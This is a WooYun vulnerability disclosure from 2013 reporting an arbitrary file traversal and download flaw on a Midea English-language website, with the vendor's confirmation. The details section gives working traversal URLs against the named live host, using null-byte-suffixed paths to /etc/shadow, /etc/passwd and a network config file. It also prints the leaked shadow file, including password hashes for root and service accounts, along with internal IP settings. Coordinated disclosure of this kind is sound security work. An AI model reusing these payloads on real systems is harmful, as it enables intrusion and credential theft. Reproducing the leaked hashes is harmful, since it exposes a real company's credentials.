当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-039940

漏洞标题:美的某英文网站任意文件遍历下载漏洞导致shadow等文件泄露

相关厂商:midea.com

漏洞作者: 霍大然

提交时间:2013-10-17 16:00

修复时间:2013-12-01 16:01

公开时间:2013-12-01 16:01

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:11

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-17: 细节已通知厂商并且等待厂商处理中
2013-10-17: 厂商已经确认,细节仅向厂商公开
2013-10-27: 细节向核心白帽子及相关领域专家公开
2013-11-06: 细节向普通白帽子公开
2013-11-16: 细节向实习白帽子公开
2013-12-01: 细节向公众公开

简要描述:

root权限导致shadow等文件可被下载

详细说明:

问题站点:
http://global.midea.com.cn/midea/

2.png


看到有两个文件:download.jsp与FileView,但download没有测试成功,FileView可用:
http://global.midea.com.cn//midea/FileView?id=../../../../../../../../../../etc/shadow%00.jpg
会看到有个图片:

2-1.PNG


下载图片用记事本打开:
root:$1$MiYaiGJD$YjEG1eOtDo0kz/oytKc.w1:15684:0:99999:7:::
bin:*:13842:0:99999:7:::
daemon:*:13842:0:99999:7:::
adm:*:13842:0:99999:7:::
lp:*:13842:0:99999:7:::
sync:*:13842:0:99999:7:::
shutdown:*:13842:0:99999:7:::
halt:*:13842:0:99999:7:::
mail:*:13842:0:99999:7:::
news:*:13842:0:99999:7:::
uucp:*:13842:0:99999:7:::
operator:*:13842:0:99999:7:::
games:*:13842:0:99999:7:::
gopher:*:13842:0:99999:7:::
ftp:*:13842:0:99999:7:::
nobody:*:13842:0:99999:7:::
dbus:!!:13842:0:99999:7:::
vcsa:!!:13842:0:99999:7:::
rpm:!!:13842:0:99999:7:::
haldaemon:!!:13842:0:99999:7:::
netdump:!!:13842:0:99999:7:::
nscd:!!:13842:0:99999:7:::
sshd:!!:13842:0:99999:7:::
rpc:!!:13842:0:99999:7:::
mailnull:!!:13842:0:99999:7:::
smmsp:!!:13842:0:99999:7:::
rpcuser:!!:13842:0:99999:7:::
nfsnobody:!!:13842:0:99999:7:::
pcap:!!:13842:0:99999:7:::
apache:!!:13842:0:99999:7:::
squid:!!:13842:0:99999:7:::
webalizer:!!:13842:0:99999:7:::
xfs:!!:13842:0:99999:7:::
ntp:!!:13842:0:99999:7:::
gdm:!!:13842:0:99999:7:::
pegasus:!!:13842:0:99999:7:::
htt:!!:13842:0:99999:7:::
amanda:!!:13842:0:99999:7:::
mideaweb:$1$XKjbr6gk$J0i8zKZ9EnbiUzjHPegXh0:14125:0:99999:7:::
mysql:!!:14125:0:99999:7:::
mon:$1$iYho7hfh$k2EgB1X3Ls5L1F9E3e4Xk.:15523:0:99999:7:::
mysql5:!!:15348:0:99999:7:::
http://global.midea.com.cn//midea/FileView?id=../../../../../../../../../../etc/passwd%00.jpg

2-3.PNG

漏洞证明:

http://global.midea.com.cn//midea/FileView?id=../../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth0%00.jpg
DEVICE=eth0
ONBOOT=yes
BOOTPROTO=none
IPADDR=172.16.16.38
NETMASK=255.255.255.0
GATEWAY=172.16.16.1
TYPE=Ethernet
USERCTL=no
IPV6INIT=no
PEERDNS=yes

修复方案:

参数过滤

版权声明:转载请注明来源 霍大然@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2013-10-17 16:45

厂商回复:

应用代码存在缺陷,核实后第一时间加固处理。

最新状态:

暂无